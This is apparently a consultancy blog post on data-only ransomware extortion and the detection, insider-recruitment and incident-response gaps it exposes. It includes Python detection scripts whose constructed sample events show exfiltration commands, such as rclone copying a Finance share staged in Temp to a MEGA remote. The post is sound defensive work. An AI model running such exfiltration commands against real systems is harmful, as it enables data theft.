Your Backups Work. Your Ransomware Strategy Doesn’t.

Ransomware has shifted to data-only extortion. Your backups work, but your detection and IR triggers may miss the real breach.

2/18/2026 · 10 min read

[Image: Your Ransomware Defenses Are Built for the Wrong Attack]

In Short

  • Detection is tuned to the wrong signals. Most EDR and SIEM rules focus on encryption activity, ransom notes, and mass file changes. Data-only exfiltration does not trigger those alerts. The tools are working as configured, but they are configured for an outdated threat model.

  • Standard insider threat programs cannot detect external recruitment. These programs typically look for behavioral changes before misconduct. Ransomware groups often approach employees with financial offers before any suspicious activity occurs. Without a behavior change, there is no alert. This is a design gap, not a monitoring failure.

  • IR playbooks lack a trigger for data-only extortion. Response plans usually activate when systems go down or encryption is detected. If operations continue normally, escalation may not occur. By the time an extortion demand arrives, logs may be incomplete and scope unclear.

  • Cyber insurance may not cover data-only scenarios. Many policies tie coverage to encryption or downtime. When neither occurs, coverage disputes can follow. Policy language should be reviewed in advance against a data-only extortion scenario.

Security In Practice | CyOps Consulting Team

The extortion email arrives weeks after the attacker left. Systems are operational. Logs have rotated. No ransom note was delivered. Nothing was encrypted. No alert fired.

You don’t know what was taken, when it was taken, or whether access still persists.

This pattern has emerged in multiple campaigns, including those attributed to ShinyHunters. In these cases, attackers quietly infiltrated corporate cloud environments and exfiltrated sensitive customer data without deploying ransomware or disrupting operations. Systems remained fully functional. No encryption occurred. Nothing the deployed controls were watching for happened, so nothing fired.

Weeks later, an extortion demand appeared, often supported by samples of stolen data posted to leak forums. By the time the organization became aware, the intrusion was already over. What remained was uncertainty: what had been taken, how long access had existed, and whether the attackers had left anything behind.

Where Current Thinking Breaks

This is not a tooling gap. It is a threat-model misalignment.

  • Your detection logic, insider threat monitoring, response triggers, and insurance language are optimized for encryption. The attacker has shifted to data theft. Your program has not shifted with it.

  • Your detection logic was built to fire on encryption events, rapid file modifications, and ransom note creation. None of those occurred. The intrusion unfolded entirely outside the threat model your controls were designed to address.

The gap begins with the assumption that ransomware resilience means the ability to restore encrypted systems. Historically, that model made sense. Ransomware meant encrypted systems, a ransom note, and a recovery decision. That understanding shaped how EDR vendors wrote alert rules, how SIEM engineers built detection logic, how incident response teams defined escalation criteria, how tabletop exercises were framed, and how cyber insurance underwriters defined a covered event.

But the economic logic has shifted. Ransomware payment rates are declining, while attack volumes climbed 47% year-over-year. Encryption creates forensic artifacts, accelerates defender response, and provides victims with a recovery path that reduces payment pressure. An operator who skips encryption eliminates all three disadvantages. Exfiltration alone delivers comparable extortion leverage. This is not a tactical tweak. It is an economic decision with a clear payoff structure.

The detection implications are straightforward. When your controls trigger on file modification rates, ransom note creation, or cryptographic library calls, exfiltration-only operations generate none of those signals. They proceed without alerting.

The problem compounds at the tooling layer. Ransomware groups such as Conti, DarkSide, Qilin, and BlackCat regularly use legitimate file-transfer tools such as rclone, MEGAsync, and Azure AzCopy to gather and exfiltrate stolen data. Signature-based controls miss this activity because there is nothing malicious to match: the binaries are the same ones your own teams run. Volume-based DLP generates alerts on routine marketing exports and developer pushes just as readily as on attacker-driven bulk exfiltration. Without behavioral baselines, your controls cannot distinguish normal business activity from adversarial staging.

This failure appears in your detection layer, in your response triggers, and in the assumptions underpinning your insider threat program.

Three Gaps Your Current Program Doesn't Cover

Gap 1: Detection Logic Built for a Different Attack

Your EDR and SIEM rules trigger on encryption behavior: rapid file modifications, ransom note creation, crypto library calls. In an exfiltration-only attack, none of those events occur. The signals your controls are waiting for never appear. The intrusion runs and your stack remains silent.

rclone, MEGAsync, and Azure AzCopy are almost certainly already present in your environment, and groups including Conti, DarkSide, Qilin, and BlackCat have documented their use for data staging and transfer. Signature-based detection fails not because these tools are obscure, but because they are legitimate. Your IT and DevOps teams rely on them. A rule that blocks rclone execution would interrupt business-critical workflows. So there is no rule, or the rule is burdened with exceptions that neutralize it.

Volume-based DLP does not close the gap. Marketing sends large datasets. Developers push substantial code commits. Backup jobs move bulk data overnight. Without user-level behavioral baselines, DLP thresholds trigger on normal activity as often as on attacker activity. Analysts begin to ignore the alert class because it fires constantly. The control technically exists, but operational noise has disabled it.

The consequence is a mean time to detection measured in months rather than days. You learn about the breach from an FBI notification, a dark web monitoring alert, or a customer who finds their own data posted publicly. By then the data has been redistributed, logs have rotated, and volatile evidence is gone. Your controls generate no signal because they were designed to detect a different event.

Gap 2: Insider Threat Programs Miss the Recruitment Vector

Most insider threat programs are built around a specific behavioral model: an employee becomes dissatisfied, then acts. The program monitors for anomalous access patterns, unusual data movement, and policy violations among existing staff. That logic is reactive. It requires a detectable change in internal behavior before it can trigger. External recruitment produces no internal behavior change before access is provided.

Ransomware groups are running structured recruitment operations. They solicit employees through Telegram, darknet forums, LinkedIn direct messages, and direct phone calls. Financial offers range from $3,000 to $15,000 for initial network access credentials. For example, the Medusa group approached a BBC employee with an opening offer of 15% of the ransom demand, then escalated to 25% when the employee didn't immediately respond. This was not opportunistic outreach. It followed a negotiation pattern.

The trusted-role problem compounds the risk. In one recent case, two cybersecurity professionals pleaded guilty to active collaboration with the BlackCat ransomware group. Insider threat programs often concentrate monitoring on low-privilege accounts or recently disciplined employees. They are not designed to scrutinize high-trust roles with deep access and strong reputations. Yet those roles carry the highest recruitment value.

The coordination gap between HR and security widens the exposure. Workforce reductions create financially stressed employees who still hold elevated access during transition periods. Security teams rarely receive advance notice of layoff schedules. Access reviews occur after notification, not before. The highest-risk phase of the employee lifecycle is left unmonitored by design. Organizations discover insider facilitation during post-incident forensics. Detection occurs at prosecution, not at access grant.

External recruitment is a program design failure. Your current controls cannot detect an approach that happens entirely outside your systems.

Gap 3: Response Playbooks Don't Trigger Without Encryption

Most incident response plans encode the same assumption: ransomware means systems are unavailable. The playbook activates when systems go down. If an attacker skips encryption, systems remain fully operational. The playbook never activates. The response chain does not begin.

The forensic consequence of delay is severe. The extortion email arrives weeks after exfiltration. At that point your team cannot determine scope, timeline, access vector, or whether persistence remains. Logs have rotated. Memory artifacts are gone. The attacker has had time to redistribute or sell the data. You enter negotiation without knowing your own exposure.

The Everest group's 2026 attack on Iron Mountain illustrates this failure mode. Exfiltration only. Extortion demand issued. No encryption event. No system outage. No ransom note to trigger standard procedure. The playbook had no activation point.

The insurance dimension is concrete. Policies that define ransomware as an encryption event are generating active coverage disputes when data is stolen without encryption. If you have not reviewed your policy language against a data-only extortion scenario, you do not know whether coverage applies when you need it most.

Tabletop exercises have not caught up. Most still simulate systems-down scenarios, such as a hospital losing EHR access or a manufacturer losing production control. Teams practice recovery decisions. They rarely rehearse the scenario where everything functions and the data is gone. There is no practiced trigger, no rehearsed escalation path, and no structured method for determining scope when encryption artifacts do not anchor the timeline.

Detection and response are separate failures with separate causes. Fixing one does not fix the other.

Adjusting Your Defenses

Each of these gaps has a different root cause and a different remedy. None require replacing your existing stack. They require changing what your controls look for and when your response chain begins.

This Week

Query your EDR and SIEM for execution of rclone, MEGAsync, and Azure AzCopy. Exclude only executions that match a documented IT or DevOps use case as a whole (account, host, and destination together), not every execution by an account that has some documented use; a recruited insider on the DevOps team is exactly the case a blanket exclusion hides. Review command-line arguments that indicate bulk transfer (copy, sync, move, recursive flags). Flag any destination IP addresses, rclone remotes, or cloud endpoints not present in your asset inventory. Execution outside documented business use warrants immediate investigation, not backlog placement.
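The triage described above, written out as an added example rather than the article's own code or any vendor's query. It assumes a normalised EDR export with account, host, image and cmdline fields; the APPROVED table and INVENTORY_HOSTS stand in for your documented use cases and asset inventory, and the sample events are constructed. Approval is keyed by destination as well as account and tool, so a documented backup account pushing to a new rclone remote is still flagged.

```python
"""Triage transfer-tool executions (rclone, AzCopy, MEGAsync) from EDR process events.

Added example for this article, not the article's own code or any vendor's.
Assumptions: events are a normalised EDR export with account/host/image/cmdline;
APPROVED and INVENTORY_HOSTS stand in for documented use cases and the asset inventory.
"""
import shlex
from dataclasses import dataclass
from urllib.parse import urlparse

TRANSFER_TOOLS = {"rclone", "azcopy", "megasync"}
BULK_VERBS = {"copy", "sync", "move", "copyto", "moveto"}   # rclone / azcopy verbs that move data

# Constructed: documented use cases keyed by (account, tool), valued by approved destinations.
# Approval is per destination, so a documented account pushing somewhere new is still flagged.
APPROVED = {
    ("svc_backup", "rclone"): {"corpbackup:"},
    ("devops.jane", "azcopy"): {"corpstorage.blob.core.windows.net"},
}
INVENTORY_HOSTS = {"corpstorage.blob.core.windows.net", "corpbackup:"}   # constructed asset inventory


@dataclass
class Finding:
    account: str
    host: str
    tool: str
    verb: str
    destination: str
    reason: str


def tool_name(image: str) -> str:
    """'C:\\Tools\\rclone.exe' -> 'rclone', '/usr/local/bin/azcopy' -> 'azcopy'."""
    base = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


def split_cmdline(cmdline: str) -> list[str]:
    # posix=False keeps Windows backslashes intact; then drop the quotes shlex leaves on tokens
    return [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]


def destination_host(args: list[str]) -> str:
    """Destination of a copy-style verb is the last positional argument.
    Options are assumed in --flag=value form; a separate-value flag would shift the positionals."""
    positional = [a for a in args if not a.startswith("-")]
    if not positional:
        return ""
    dest = positional[-1]
    if "://" in dest:                          # azcopy: https://<account>.blob.core.windows.net/...
        return urlparse(dest).hostname or dest
    if ":" in dest and dest[1:3] != ":\\":    # rclone remote 'name:path' (not a drive letter)
        return dest.split(":", 1)[0] + ":"
    return dest


def triage(events) -> list[Finding]:
    findings = []
    for ev in events:
        tool = tool_name(ev["image"])
        if tool not in TRANSFER_TOOLS:
            continue
        args = split_cmdline(ev["cmdline"])[1:]
        if tool == "megasync":                 # GUI sync client: no verb, destination is always MEGA
            verb, dest = "sync", "mega.nz"
        else:
            verb = args[0].lower() if args else ""
            dest = destination_host(args[1:])
        if verb not in BULK_VERBS:             # 'rclone config', 'azcopy jobs list' etc. move no data
            continue
        approved = APPROVED.get((ev["account"], tool), set())
        if dest in approved:
            continue
        if approved:
            reason = "documented account, undocumented destination"
        elif dest in INVENTORY_HOSTS:
            reason = "undocumented account, corporate destination"
        else:
            reason = "undocumented account, destination not in inventory"
        findings.append(Finding(ev["account"], ev["host"], tool, verb, dest, reason))
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"account": "svc_backup", "host": "BK-01", "image": r"C:\Tools\rclone.exe",
     "cmdline": r"rclone.exe sync D:\Backups corpbackup:nightly --transfers=8"},
    {"account": "svc_backup", "host": "BK-01", "image": r"C:\Tools\rclone.exe",
     "cmdline": r'rclone.exe copy "\\fileserver\HR" mega:hr -P'},
    {"account": "devops.jane", "host": "BLD-03", "image": "/usr/local/bin/azcopy",
     "cmdline": 'azcopy copy "/build/out/*" "https://corpstorage.blob.core.windows.net/artifacts?sv=2024" --recursive'},
    {"account": "devops.jane", "host": "BLD-03", "image": "/usr/local/bin/azcopy",
     "cmdline": "azcopy jobs list"},
    {"account": "m.chen", "host": "WS-112", "image": r"C:\Tools\rclone.exe",
     "cmdline": r'rclone.exe copy "\\fileserver\Finance" corpbackup:finance'},
    {"account": "j.smith", "host": "WS-207", "image": r"C:\Users\j.smith\AppData\Local\MEGAsync\MEGAsync.exe",
     "cmdline": r'"C:\Users\j.smith\AppData\Local\MEGAsync\MEGAsync.exe"'},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.account}@{f.host}: {f.tool} {f.verb} -> {f.destination} [{f.reason}]")
```

Three of the six constructed events survive triage: the backup account copying HR data to a MEGA remote, an undocumented user copying Finance to the corporate backup remote, and a MEGAsync client that has no business being on a workstation. The two approved transfers and the non-transfer `azcopy jobs list` are dropped.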

Pull 90 days of large outbound data transfers during off-hours, grouped by individual account. Volume alone is not the signal. The anomaly is volume at a time inconsistent with that account's historical pattern. Compare off-hours transfer volume against each user's 90-day daytime baseline. Set thresholds per account, not per environment: a backup service account that legitimately moves bulk data every night has a large off-hours baseline of its own and should be judged against that, while a user who has never transferred anything after hours should be judged against their own daytime volume.

Enumerate all active OAuth authorizations connecting third-party cloud storage applications to corporate accounts. Revoke any authorization without documented business justification. In most cloud identity platforms this can be completed quickly and removes a persistent exfiltration path that does not require ongoing attacker access.

Run a paper exercise with your IR lead using this scenario: an extortion email arrives today, systems are operational, no encryption event, no ransom note. Answer four questions. What triggers response activation? Who is notified first? What is the first forensic preservation step? How is scope determined without encryption artifacts? Any uncertainty identifies the precise activation gap described in Gap 3.

This Quarter

Begin building user-level behavioral baselines for data movement in your SIEM or UEBA platform. Log per-account transfer volume, transfer timing, destination classification (corporate endpoints, consumer cloud services, or unclassified external), and data type where DLP tagging exists. Baselines require 30 to 60 days of stable data before generating reliable signal, and a robust statistic (median and median absolute deviation) holds up better than a mean when a few large legitimate transfers sit in the history. Start logging configuration now. Procurement decisions can follow later.
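The per-account baseline described in this quarter's item, and the off-hours comparison from this week's 90-day pull, worked through as one added example; it is not the article's code or any UEBA product's logic. It assumes records already reduced to account, timestamp, bytes and destination class (what a SIEM export would give you), business hours of 08:00 to 18:00 on weekdays, and constructed sample data: two daytime users and a nightly backup service account. It goes slightly beyond the text in two ways: an account with enough off-hours history is scored against that history rather than its daytime baseline (so the backup job is not a perpetual alert), and a first-ever transfer to a destination class the account has never used is a finding even when the volume is unremarkable.

```python
"""Per-account behavioural baseline for outbound data movement.

Added example for this article, not the article's own code or any product's.
Assumptions: records are already reduced to (account, ts, bytes, dest_class),
as a SIEM/UEBA export would provide; business hours are 08:00-18:00 local on weekdays;
all sample records are constructed.
"""
from collections import defaultdict
from datetime import date, datetime, timedelta
from statistics import median

MB = 1_000_000
BUSINESS_HOURS = range(8, 18)
EVAL_DAYS = 7            # score the most recent week against all earlier history
MIN_HISTORY_DAYS = 14    # fewer active days than this in a slot: fall back to daytime stats
ROBUST_Z = 5.0           # MAD-based z-score threshold
VOLUME_FLOOR = 100 * MB  # never raise a volume finding below this absolute size


def slot(ts: datetime) -> str:
    return "daytime" if ts.weekday() < 5 and ts.hour in BUSINESS_HOURS else "offhours"


def daily_totals(records):
    """{(account, slot): {date: bytes}}."""
    totals = defaultdict(lambda: defaultdict(int))
    for r in records:
        totals[(r["account"], slot(r["ts"]))][r["ts"].date()] += r["bytes"]
    return totals


def robust_stats(values):
    """Median and MAD-scaled spread; a few large legitimate transfers in history barely move it."""
    m = median(values)
    return m, 1.4826 * median(abs(v - m) for v in values)


def build_baselines(records, cutoff: date):
    history = [r for r in records if r["ts"].date() < cutoff]
    stats = {key: robust_stats(list(per_day.values()))
             for key, per_day in daily_totals(history).items()
             if len(per_day) >= MIN_HISTORY_DAYS}
    known_dests = defaultdict(set)
    for r in history:
        known_dests[r["account"]].add(r["dest_class"])
    return stats, known_dests


def detect(records, today: date):
    """Findings: (account, day, slot, kind, score); kind is 'volume' or 'new-destination:<class>'."""
    cutoff = today - timedelta(days=EVAL_DAYS - 1)
    stats, known_dests = build_baselines(records, cutoff)
    recent = [r for r in records if r["ts"].date() >= cutoff]
    findings = []
    for (account, sl), per_day in daily_totals(recent).items():
        # the account's own history in this slot; a nightly backup job scores against its nights
        base = stats.get((account, sl)) or stats.get((account, "daytime"))
        if base is None:
            continue          # brand-new account: that is an access-review problem, not a baseline one
        med, scale = base
        for day, vol in sorted(per_day.items()):
            z = (vol - med) / max(scale, 1 * MB)   # floor the scale so a constant history cannot divide by zero
            if vol >= VOLUME_FLOOR and z > ROBUST_Z:
                findings.append((account, str(day), sl, "volume", round(z, 1)))
    seen = set()
    for r in sorted(recent, key=lambda r: r["ts"]):
        key = (r["account"], r["dest_class"])
        if r["dest_class"] not in known_dests[r["account"]] and key not in seen:
            seen.add(key)     # first use of a destination class this account never used in 90 days
            findings.append((r["account"], str(r["ts"].date()), slot(r["ts"]),
                             "new-destination:" + r["dest_class"], 0.0))
    return findings


def constructed_records():
    """90 days of synthetic transfers: alice and carol work daytime, bob is a nightly backup job."""
    base = datetime(2025, 12, 1)
    recs = []
    for d in range(90):
        day = base + timedelta(days=d)
        if day.weekday() < 5:
            recs.append({"account": "alice", "ts": day.replace(hour=10),
                         "bytes": (200 + (d % 5) * 20) * MB, "dest_class": "corporate"})
            recs.append({"account": "carol", "ts": day.replace(hour=9, minute=30),
                         "bytes": (180 + (d % 5) * 15) * MB, "dest_class": "corporate"})
        recs.append({"account": "bob", "ts": day.replace(hour=2),
                     "bytes": (50_000 + (d % 4) * 100) * MB, "dest_class": "corporate"})
    # the two events worth a look: a 4 GB night-time push, and a small push to a never-used destination
    recs.append({"account": "alice", "ts": base + timedelta(days=89, hours=2, minutes=30),
                 "bytes": 4096 * MB, "dest_class": "consumer_cloud"})
    recs.append({"account": "carol", "ts": base + timedelta(days=85, hours=21),
                 "bytes": 240 * MB, "dest_class": "consumer_cloud"})
    return recs


SAMPLE_RECORDS = constructed_records()

if __name__ == "__main__":
    for f in detect(SAMPLE_RECORDS, date(2026, 2, 28)):
        print(f)
```

On the constructed data, bob's 50 GB nights never fire because they are his own baseline; alice's 4 GB at 02:30 fires on volume against her daytime median of 240 MB, and both alice's and carol's first use of a consumer cloud destination fire as new-destination findings. Carol's 240 MB transfer is well inside her normal daytime range, which is the point: a per-environment volume threshold would have missed it or drowned it in backup-job noise.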

Author exfiltration-specific detection rules within your existing EDR. Monitor for large archive creation through 7z, zip, or tar followed by outbound transfer. Flag access to file shares or repositories by accounts without documented business need. Identify staging behavior in temp directories or user-profile paths preceding transfer events. These behaviors are observable with current tooling. The constraint is authoring time.
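The archive-then-transfer sequence from the paragraph above, as an added example of the rule logic rather than any EDR vendor's rule language or the article's own code. It assumes process events with image and cmdline and netconn events with dst and bytes_out, as a normalised EDR export would carry; WINDOW, NETCONN_BYTES, STAGING_MARKERS and INVENTORY_HOSTS are illustrative values and every sample event is constructed. A build server tarring its own output and pushing it to corporate storage matches the same sequence, so the example grades severity by the two things the article names, staging in a temp or user-profile path and a destination outside the inventory, instead of suppressing the build case outright.

```python
"""Correlate archive creation with a following outbound transfer on the same host and user.

Added example for this article, not the article's own code or any vendor's.
Assumptions: process events carry image and cmdline, netconn events carry dst and
bytes_out (as a normalised EDR export would); WINDOW, NETCONN_BYTES, STAGING_MARKERS
and INVENTORY_HOSTS are illustrative values; all sample events are constructed.
"""
import shlex
from datetime import datetime, timedelta

ARCHIVERS = {"7z", "7za", "zip", "tar"}
TRANSFER_TOOLS = {"rclone", "azcopy", "megasync", "curl", "scp"}
WINDOW = timedelta(hours=2)                      # archive -> transfer gap worth correlating
NETCONN_BYTES = 500 * 1_000_000                  # "bulk" threshold for the netconn leg
STAGING_MARKERS = ("\\temp\\", "\\users\\", "/tmp/", "/home/")
INVENTORY_HOSTS = {"corpstorage.blob.core.windows.net", "corpbackup:"}   # constructed


def tool_name(image: str) -> str:
    base = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


def split_cmdline(cmdline: str) -> list[str]:
    return [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]


def archive_output(tool: str, args: list[str]):
    """Path an archiver will write, or None when the call does not create an archive."""
    if tool in ("7z", "7za"):
        return args[1] if len(args) > 1 and args[0].lower() == "a" else None
    if tool == "zip":
        positional = [a for a in args if not a.startswith("-")]
        return positional[0] if positional else None
    if tool == "tar":   # combined flags only ('tar -czf OUT ...'); 'tar -c -f OUT' would need option parsing
        for i, a in enumerate(args[:-1]):
            if a.startswith("-") and not a.startswith("--") and "c" in a and "f" in a:
                return args[i + 1]
    return None


def staged_in_user_path(path: str) -> bool:
    return any(m in path.lower() for m in STAGING_MARKERS)


def detect(events):
    """Findings for archive -> transfer sequences within WINDOW for the same (host, user)."""
    pending, findings = [], []
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["host"], ev["user"])
        leg = None
        if ev["type"] == "process":
            tool = tool_name(ev["image"])
            args = split_cmdline(ev["cmdline"])[1:]
            if tool in ARCHIVERS:
                out = archive_output(tool, args)
                if out:
                    pending.append({"key": key, "ts": ev["ts"], "path": out,
                                    "staged": staged_in_user_path(out)})
                continue
            if tool in TRANSFER_TOOLS:
                positional = [a for a in args if not a.startswith("-")]
                dest = positional[-1] if positional else ""
                leg = f"{tool} -> {dest}"
                known = any(h in dest for h in INVENTORY_HOSTS)
        elif ev["type"] == "netconn" and ev["bytes_out"] >= NETCONN_BYTES:
            leg = f"{ev['bytes_out']} bytes -> {ev['dst']}"
            known = ev["dst"] in INVENTORY_HOSTS
        if leg is None:
            continue
        for arc in list(pending):
            if arc["key"] == key and timedelta(0) <= ev["ts"] - arc["ts"] <= WINDOW:
                severity = "high" if (arc["staged"] or not known) else "review"
                findings.append({"host": ev["host"], "user": ev["user"], "archive": arc["path"],
                                 "transfer": leg,
                                 "minutes": int((ev["ts"] - arc["ts"]).total_seconds() // 60),
                                 "severity": severity})
                pending.remove(arc)   # one finding per archive; a later leg needs its own archive
    return findings


T = datetime.fromisoformat
# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"type": "process", "ts": T("2026-02-20T22:05:00"), "host": "WS-42", "user": "j.doe",
     "image": r"C:\Tools\7z.exe",
     "cmdline": r'7z.exe a "C:\Users\j.doe\AppData\Local\Temp\q4.7z" "\\fileserver\Finance\Q4" -mx1'},
    {"type": "netconn", "ts": T("2026-02-20T22:41:00"), "host": "WS-42", "user": "j.doe",
     "dst": "mega.nz", "bytes_out": 3_100_000_000},
    {"type": "process", "ts": T("2026-02-20T22:40:00"), "host": "WS-42", "user": "j.doe",
     "image": r"C:\Tools\rclone.exe",
     "cmdline": r'rclone.exe copy "C:\Users\j.doe\AppData\Local\Temp\q4.7z" mega:out -P'},
    {"type": "process", "ts": T("2026-02-20T14:00:00"), "host": "BLD-01", "user": "buildsvc",
     "image": "/usr/bin/tar", "cmdline": "tar -czf /var/build/out/app-1.2.tgz dist/"},
    {"type": "process", "ts": T("2026-02-20T14:03:00"), "host": "BLD-01", "user": "buildsvc",
     "image": "/usr/local/bin/azcopy",
     "cmdline": "azcopy copy /var/build/out/app-1.2.tgz https://corpstorage.blob.core.windows.net/artifacts/app-1.2.tgz"},
    {"type": "process", "ts": T("2026-02-20T11:00:00"), "host": "WS-17", "user": "a.lee",
     "image": r"C:\Program Files\zip\zip.exe",
     "cmdline": r'zip.exe -r "C:\Users\a.lee\Documents\proj.zip" C:\dev\proj'},
    {"type": "process", "ts": T("2026-02-20T16:30:00"), "host": "WS-17", "user": "a.lee",
     "image": r"C:\Tools\rclone.exe", "cmdline": r"rclone.exe copy C:\dev\proj corpbackup:proj"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
```

Two findings come out: the build server's tar-then-azcopy to corporate storage at "review" severity, and the workstation that archived a Finance share into the user's Temp directory and pushed it to a MEGA remote 35 minutes later at "high". The zip on WS-17 followed by an rclone run five and a half hours later falls outside the window and is not reported; a longer window is a tuning decision, not a code change.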

Add a targeted scenario to your next security awareness cycle. Explain what an employee should do if offered payment for network access through any channel, including personal phone, personal email, or social media. Define the reporting path. State clearly that reporting is non-punitive. Emphasize that IT, security, and other privileged roles are targeted at higher rates. Most awareness programs do not address this. Employees cannot follow a protocol that does not exist.

Request advance notification from HR regarding workforce reductions or restructuring events. Conduct privileged access review before announcement. Focus on accounts with access to sensitive repositories, cloud storage with broad write permissions, and identity provider administrative roles. Treat reduction-in-force events as security-relevant events requiring coordination, not as HR processes that security reacts to afterward.

This Cycle

Add exfiltration-specific activation criteria to your IR plan alongside existing encryption triggers. Include anomalous data movement identified in your SIEM, third-party notification of data exposure, customer reports of leaked data, confirmed dark web data appearance, or receipt of a credible extortion communication without encryption. Each must activate the same escalation path, forensic preservation steps, and legal review as a systems-down event.

Review your cyber insurance policy and locate the ransomware definition. If coverage requires encryption, system unavailability, or a ransom note, request written clarification from your broker regarding data-only extortion before renewal. Coverage disputes in this scenario are documented. Discovering a policy gap during an active incident leaves no corrective path.

Assess whether your DLP inspects outbound transfers over TLS to consumer cloud storage. Many legacy deployments do not. TLS inspection may be disabled or scoped to exclude consumer endpoints for performance or privacy reasons, and without it DLP sees only destination and byte counts, not content. This assessment clarifies your actual detection coverage and informs future tooling decisions.

The sequencing matters. Behavioral baselining started this quarter must accumulate data before producing useful signal. IR plan revisions this cycle should incorporate the activation gaps identified in this week's exercise.

The Decision Framework

Detection is prerequisite to response. You cannot respond to what you cannot see. Improving the playbook without improving detection yields a stronger response to an event you still fail to identify. A recruited insider using legitimate credentials generates activity that authentication and authorization controls treat as normal; only the behavioral baselines from Gap 1 have a chance of separating it from routine work, which is why Gap 1 and Gap 2 have to be closed together rather than in sequence. And your playbook triggers when systems fail. This attack leaves them running.

Your organization built ransomware resilience around system restoration. This threat targets data confidentiality. Stolen data cannot be restored from backup. It can only be detected before exfiltration and contained before extortion. The required investment lies in detection logic and response procedures for this attack type. Backups protect availability. They do not protect confidentiality. Data-only extortion is a confidentiality breach.

In healthcare, exfiltration of patient data triggers HIPAA breach notification obligations whether or not the attacker encrypted anything. In financial services, data theft triggers regulatory notification requirements independent of system disruption. In manufacturing, intellectual property theft creates competitive harm that recovery procedures cannot reverse. Once the data leaves, the advantage is lost.

What To Watch Next

The same economic logic driving exfiltration-only operations will continue to shape operator behavior. When encryption accelerates defender response, reduces payment pressure, or triggers insurance exclusions, it becomes optional. Data theft alone preserves leverage while avoiding those disadvantages. If the leverage from encryption declines further, operators will add other forms of coercion to restore it.

Some groups are already combining DDoS attacks with data theft to apply simultaneous operational and reputational pressure. This is not tactical creativity for its own sake. It is economic calibration. When one lever weakens, another is added. If your DDoS mitigation and ransomware response operate under separate plans, run a tabletop that exercises both concurrently. A dual-pressure scenario should activate the same escalation path as a systems-down event.

Recruitment patterns are evolving under the same incentive structure. When external access brokers become more visible and defensive controls tighten, operators expand inward. Ransomware groups are recruiting through gig economy channels, including delivery personnel, maintenance contractors, and facilities staff, to obtain physical network access when remote vectors are insufficient. Conduct a bounded review. Identify who holds unescorted physical access to network infrastructure under current vendor controls and confirm what those controls require in practice. Physical access remains an underpriced variable in most ransomware models.

Continue tracking operator activity through NCC Group's monthly ransomware reports, Recorded Future's threat intelligence reporting, and Cyble's tracking. These sources follow Medusa, Everest, and Qilin with sufficient operator-level detail to inform detection updates and IR trigger adjustments. If payment rates continue to decline, economic pressure will continue to favor exfiltration-first or multi-vector extortion models. Defensive adjustments must track that incentive structure, not last year's tooling patterns.


Brought to you by the CyOps Consulting Team.